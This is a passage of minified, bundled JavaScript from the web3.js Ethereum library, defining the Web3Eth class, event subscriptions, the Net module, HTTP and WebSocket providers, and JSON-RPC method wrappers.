                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Eth = t.registeredSubscriptions = void 0;
                const a = r(9970), u = r(6527), c = r(5071), l = r(9634), d = r(1181), h = o(r(3222)), f = r(7460);
                t.registeredSubscriptions = {
                    logs: f.LogsSubscription,
                    newPendingTransactions: f.NewPendingTransactionsSubscription,
                    newHeads: f.NewHeadsSubscription,
                    syncing: f.SyncingSubscription,
                    pendingTransactions: f.NewPendingTransactionsSubscription,
                    newBlockHeaders: f.NewHeadsSubscription
                };
                class p extends u.Web3Context {
                    constructor(e){
                        "string" == typeof e || (0, u.isSupportedProvider)(e) ? super({
                            provider: e,
                            registeredSubscriptions: t.registeredSubscriptions
                        }) : e.registeredSubscriptions ? super(e) : super(Object.assign(Object.assign({}, e), {
                            registeredSubscriptions: t.registeredSubscriptions
                        }));
                    }
                    getProtocolVersion() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getProtocolVersion(this.requestManager);
                        });
                    }
                    isSyncing() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getSyncing(this.requestManager);
                        });
                    }
                    getCoinbase() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getCoinbase(this.requestManager);
                        });
                    }
                    isMining() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getMining(this.requestManager);
                        });
                    }
                    getHashrate(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return this.getHashRate(e);
                        });
                    }
                    getHashRate(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getHashRate(this, e);
                        });
                    }
                    getGasPrice(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getGasPrice(this, e);
                        });
                    }
                    getAccounts() {
                        var e;
                        return s(this, void 0, void 0, function*() {
                            return (null !== (e = yield d.ethRpcMethods.getAccounts(this.requestManager)) && void 0 !== e ? e : []).map((e)=>(0, l.toChecksumAddress)(e));
                        });
                    }
                    getBlockNumber(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlockNumber(this, e);
                        });
                    }
                    getBalance(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBalance(this, e, t, r);
                        });
                    }
                    getStorageAt(e, t, r = this.defaultBlock, n = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getStorageAt(this, e, t, r, n);
                        });
                    }
                    getCode(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getCode(this, e, t, r);
                        });
                    }
                    getBlock(e = this.defaultBlock, t = !1, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlock(this, e, t, r);
                        });
                    }
                    getBlockTransactionCount(e = this.defaultBlock, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlockTransactionCount(this, e, t);
                        });
                    }
                    getBlockUncleCount(e = this.defaultBlock, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlockUncleCount(this, e, t);
                        });
                    }
                    getUncle(e = this.defaultBlock, t, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getUncle(this, e, t, r);
                        });
                    }
                    getTransaction(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            const r = yield h.getTransaction(this, e, t);
                            if (!r) throw new c.TransactionNotFound;
                            return r;
                        });
                    }
                    getPendingTransactions(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getPendingTransactions(this, e);
                        });
                    }
                    getTransactionFromBlock(e = this.defaultBlock, t, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getTransactionFromBlock(this, e, t, r);
                        });
                    }
                    getTransactionReceipt(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            const r = yield h.getTransactionReceipt(this, e, t);
                            if (!r) throw new c.TransactionNotFound;
                            return r;
                        });
                    }
                    getTransactionCount(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getTransactionCount(this, e, t, r);
                        });
                    }
                    sendTransaction(e, t = a.DEFAULT_RETURN_FORMAT, r) {
                        return h.sendTransaction(this, e, t, r);
                    }
                    sendSignedTransaction(e, t = a.DEFAULT_RETURN_FORMAT, r) {
                        return h.sendSignedTransaction(this, e, t, r);
                    }
                    sign(e, t, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.sign(this, e, t, r);
                        });
                    }
                    signTransaction(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.signTransaction(this, e, t);
                        });
                    }
                    call(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.call(this, e, t, r);
                        });
                    }
                    estimateGas(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.estimateGas(this, e, t, r);
                        });
                    }
                    getPastLogs(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getLogs(this, e, t);
                        });
                    }
                    getWork() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getWork(this.requestManager);
                        });
                    }
                    submitWork(e, t, r) {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.submitWork(this.requestManager, e, t, r);
                        });
                    }
                    requestAccounts() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.requestAccounts(this.requestManager);
                        });
                    }
                    getChainId(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getChainId(this, e);
                        });
                    }
                    getNodeInfo() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getNodeInfo(this.requestManager);
                        });
                    }
                    getProof(e, t, r = this.defaultBlock, n = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getProof(this, e, t, r, n);
                        });
                    }
                    getFeeHistory(e, t = this.defaultBlock, r, n = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getFeeHistory(this, e, t, r, n);
                        });
                    }
                    createAccessList(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.createAccessList(this, e, t, r);
                        });
                    }
                    subscribe(e, t, r = a.DEFAULT_RETURN_FORMAT) {
                        var n;
                        return s(this, void 0, void 0, function*() {
                            const i = yield null === (n = this.subscriptionManager) || void 0 === n ? void 0 : n.subscribe(e, t, r);
                            return i instanceof f.LogsSubscription && "logs" === e && "object" == typeof t && !(0, l.isNullish)(t.fromBlock) && Number.isFinite(Number(t.fromBlock)) && setImmediate(()=>{
                                this.getPastLogs(t).then((e)=>{
                                    for (const t of e)i._processSubscriptionResult(t);
                                }).catch((e)=>{
                                    i._processSubscriptionError(e);
                                });
                            }), i;
                        });
                    }
                    static shouldClearSubscription({ sub: e }) {
                        return !(e instanceof f.SyncingSubscription);
                    }
                    clearSubscriptions(e = !1) {
                        var t;
                        return null === (t = this.subscriptionManager) || void 0 === t ? void 0 : t.unsubscribe(e ? p.shouldClearSubscription : void 0);
                    }
                }
                t.Web3Eth = p;
            },
            7460: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SyncingSubscription = t.NewHeadsSubscription = t.NewPendingTransactionsSubscription = t.LogsSubscription = void 0;
                const n = r(9634), i = r(6527), o = r(1922);
                class s extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "logs",
                            this.args
                        ];
                    }
                    _processSubscriptionResult(e) {
                        this.emit("data", (0, n.format)(o.logSchema, e, super.returnFormat));
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.LogsSubscription = s;
                class a extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "newPendingTransactions"
                        ];
                    }
                    _processSubscriptionResult(e) {
                        this.emit("data", (0, n.format)({
                            format: "string"
                        }, e, super.returnFormat));
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.NewPendingTransactionsSubscription = a;
                class u extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "newHeads"
                        ];
                    }
                    _processSubscriptionResult(e) {
                        this.emit("data", (0, n.format)(o.blockHeaderSchema, e, super.returnFormat));
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.NewHeadsSubscription = u;
                class c extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "syncing"
                        ];
                    }
                    _processSubscriptionResult(e) {
                        if ("boolean" == typeof e) this.emit("changed", e);
                        else {
                            const t = Object.fromEntries(Object.entries(e.status).map(([e, t])=>[
                                    e.charAt(0).toLowerCase() + e.substring(1),
                                    t
                                ]));
                            this.emit("changed", e.syncing), this.emit("data", (0, n.format)(o.syncSchema, t, super.returnFormat));
                        }
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.SyncingSubscription = c;
            },
            9820: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(2491);
                i(r(2491), t), i(r(7961), t), t.default = o.Net;
            },
            2491: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Net = void 0;
                const a = r(6527), u = r(9970), c = o(r(7961));
                class l extends a.Web3Context {
                    getId(e = u.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return c.getId(this, e);
                        });
                    }
                    getPeerCount(e = u.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return c.getPeerCount(this, e);
                        });
                    }
                    isListening() {
                        return s(this, void 0, void 0, function*() {
                            return c.isListening(this);
                        });
                    }
                }
                t.Net = l;
            },
            7961: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isListening = t.getPeerCount = t.getId = void 0;
                const i = r(9634), o = r(1181);
                t.getId = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield o.netRpcMethods.getId(e.requestManager);
                        return (0, i.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getPeerCount = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield o.netRpcMethods.getPeerCount(e.requestManager);
                        return (0, i.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.isListening = (e)=>n(void 0, void 0, void 0, function*() {
                        return o.netRpcMethods.isListening(e.requestManager);
                    });
            },
            6343: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                }, i = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.HttpProvider = void 0;
                const o = i(r(6279)), s = r(9970), a = r(5071);
                class u extends s.Web3BaseProvider {
                    constructor(e, t){
                        if (super(), !u.validateClientUrl(e)) throw new a.InvalidClientError(e);
                        this.clientUrl = e, this.httpProviderOptions = t;
                    }
                    static validateClientUrl(e) {
                        return "string" == typeof e && /^http(s)?:\/\//i.test(e);
                    }
                    getStatus() {
                        throw new a.MethodNotImplementedError;
                    }
                    supportsSubscriptions() {
                        return !1;
                    }
                    request(e, t) {
                        var r;
                        return n(this, void 0, void 0, function*() {
                            const n = Object.assign(Object.assign({}, null === (r = this.httpProviderOptions) || void 0 === r ? void 0 : r.providerOptions), t), i = yield (0, o.default)(this.clientUrl, Object.assign(Object.assign({}, n), {
                                method: "POST",
                                headers: Object.assign(Object.assign({}, n.headers), {
                                    "Content-Type": "application/json"
                                }),
                                body: JSON.stringify(e)
                            }));
                            if (!i.ok) throw new a.ResponseError((yield i.json()));
                            return yield i.json();
                        });
                    }
                    on() {
                        throw new a.MethodNotImplementedError;
                    }
                    removeListener() {
                        throw new a.MethodNotImplementedError;
                    }
                    once() {
                        throw new a.MethodNotImplementedError;
                    }
                    removeAllListeners() {
                        throw new a.MethodNotImplementedError;
                    }
                    connect() {
                        throw new a.MethodNotImplementedError;
                    }
                    disconnect() {
                        throw new a.MethodNotImplementedError;
                    }
                    reset() {
                        throw new a.MethodNotImplementedError;
                    }
                    reconnect() {
                        throw new a.MethodNotImplementedError;
                    }
                }
                t.default = u, t.HttpProvider = u;
            },
            1161: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.WebSocketProvider = void 0;
                const i = n(r(7475)), o = r(9634), s = r(5071);
                class a extends o.SocketProvider {
                    constructor(e, t, r){
                        super(e, t, r);
                    }
                    _validateProviderPath(e) {
                        return "string" == typeof e && /^ws(s)?:\/\//i.test(e);
                    }
                    getStatus() {
                        if (this._socketConnection && !(0, o.isNullish)(this._socketConnection)) switch(this._socketConnection.readyState){
                            case this._socketConnection.CONNECTING:
                                return "connecting";
                            case this._socketConnection.OPEN:
                                return "connected";
                            default:
                                return "disconnected";
                        }
                        return "disconnected";
                    }
                    _openSocketConnection() {
                        this._socketConnection = new i.default(this._socketPath, void 0, this._socketOptions && 0 === Object.keys(this._socketOptions).length ? void 0 : this._socketOptions);
                    }
                    _closeSocketConnection(e, t) {
                        var r;
                        null === (r = this._socketConnection) || void 0 === r || r.close(e, t);
                    }
                    _sendToSocket(e) {
                        var t;
                        if ("disconnected" === this.getStatus()) throw new s.ConnectionNotOpenError;
                        null === (t = this._socketConnection) || void 0 === t || t.send(JSON.stringify(e));
                    }
                    _parseResponses(e) {
                        return this.chunkResponseParser.parseResponse(e.data);
                    }
                    _addSocketListeners() {
                        var e, t, r, n;
                        null === (e = this._socketConnection) || void 0 === e || e.addEventListener("open", this._onOpenHandler), null === (t = this._socketConnection) || void 0 === t || t.addEventListener("message", this._onMessageHandler), null === (r = this._socketConnection) || void 0 === r || r.addEventListener("close", (e)=>this._onCloseHandler(e)), null === (n = this._socketConnection) || void 0 === n || n.addEventListener("error", this._onErrorHandler);
                    }
                    _removeSocketListeners() {
                        var e, t, r;
                        null === (e = this._socketConnection) || void 0 === e || e.removeEventListener("message", this._onMessageHandler), null === (t = this._socketConnection) || void 0 === t || t.removeEventListener("open", this._onOpenHandler), null === (r = this._socketConnection) || void 0 === r || r.removeEventListener("close", this._onCloseHandler);
                    }
                    _onCloseEvent(e) {
                        var t;
                        !this._reconnectOptions.autoReconnect || [
                            1e3,
                            1001
                        ].includes(e.code) && e.wasClean ? (this._clearQueues(e), this._removeSocketListeners(), this._onDisconnect(e.code, e.reason), null === (t = this._socketConnection) || void 0 === t || t.removeEventListener("error", this._onErrorHandler)) : this._reconnect();
                    }
                }
                t.default = a, t.WebSocketProvider = a;
            },
            9298: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getNodeInfo = t.getProof = t.getChainId = t.requestAccounts = t.getPendingTransactions = t.getFeeHistory = t.submitHashrate = t.submitWork = t.getWork = t.getLogs = t.getFilterLogs = t.getFilterChanges = t.uninstallFilter = t.newPendingTransactionFilter = t.newBlockFilter = t.newFilter = t.compileSerpent = t.compileLLL = t.compileSolidity = t.getCompilers = t.getUncleByBlockNumberAndIndex = t.getUncleByBlockHashAndIndex = t.getTransactionReceipt = t.getTransactionByBlockNumberAndIndex = t.getTransactionByBlockHashAndIndex = t.getTransactionByHash = t.getBlockByNumber = t.getBlockByHash = t.estimateGas = t.call = t.sendRawTransaction = t.sendTransaction = t.signTransaction = t.sign = t.getCode = t.getUncleCountByBlockNumber = t.getUncleCountByBlockHash = t.getBlockTransactionCountByNumber = t.getBlockTransactionCountByHash = t.getTransactionCount = t.getStorageAt = t.getBalance = t.getBlockNumber = t.getAccounts = t.getGasPrice = t.getHashRate = t.getMining = t.getCoinbase = t.getSyncing = t.getProtocolVersion = void 0, t.createAccessList = void 0;
                const i = r(7345);
                t.getProtocolVersion = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_protocolVersion",
                            params: []
                        });
                    });
                }, t.getSyncing = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_syncing",
                            params: []
                        });
                    });
                }, t.getCoinbase = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_coinbase",
                            params: []
                        });
                    });
                }, t.getMining = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_mining",
                            params: []
                        });
                    });
                }, t.getHashRate = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_hashrate",
                            params: []
                        });
                    });
                }, t.getGasPrice = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_gasPrice",
                            params: []
                        });
                    });
                }, t.getAccounts = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_accounts",
                            params: []
                        });
                    });
                }, t.getBlockNumber = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_blockNumber",
                            params: []
                        });
                    });
                }, t.getBalance = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getBalance",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getStorageAt = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "hex",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r,
                            o
                        ]), e.send({
                            method: "eth_getStorageAt",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.getTransactionCount = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getTransactionCount",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getBlockTransactionCountByHash = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getBlockTransactionCountByHash",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getBlockTransactionCountByNumber = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getBlockTransactionCountByNumber",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getUncleCountByBlockHash = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getUncleCountByBlockHash",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getUncleCountByBlockNumber = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getUncleCountByBlockNumber",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getCode = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getCode",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.sign = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_sign",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.signTransaction = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_signTransaction",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.sendTransaction = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_sendTransaction",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.sendRawTransaction = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_sendRawTransaction",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.call = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            r
                        ]), e.send({
                            method: "eth_call",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.estimateGas = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            r
                        ]), e.send({
                            method: "eth_estimateGas",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getBlockByHash = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "bool"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getBlockByHash",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getBlockByNumber = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag",
                            "bool"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getBlockByNumber",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getTransactionByHash = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getTransactionByHash",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getTransactionByBlockHashAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getTransactionByBlockHashAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getTransactionByBlockNumberAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getTransactionByBlockNumberAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getTransactionReceipt = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getTransactionReceipt",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getUncleByBlockHashAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getUncleByBlockHashAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getUncleByBlockNumberAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getUncleByBlockNumberAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getCompilers = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_getCompilers",
                            params: []
                        });
                    });
                }, t.compileSolidity = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "string"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_compileSolidity",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.compileLLL = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "string"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_compileLLL",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.compileSerpent = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "string"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_compileSerpent",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.newFilter = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "filter"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_newFilter",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.newBlockFilter = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_newBlockFilter",
                            params: []
                        });
                    });
                }, t.newPendingTransactionFilter = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_newPendingTransactionFilter",
                            params: []
                        });
                    });
                }, t.uninstallFilter = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_uninstallFilter",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getFilterChanges = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getFilterChanges",
                            params: [
                                t
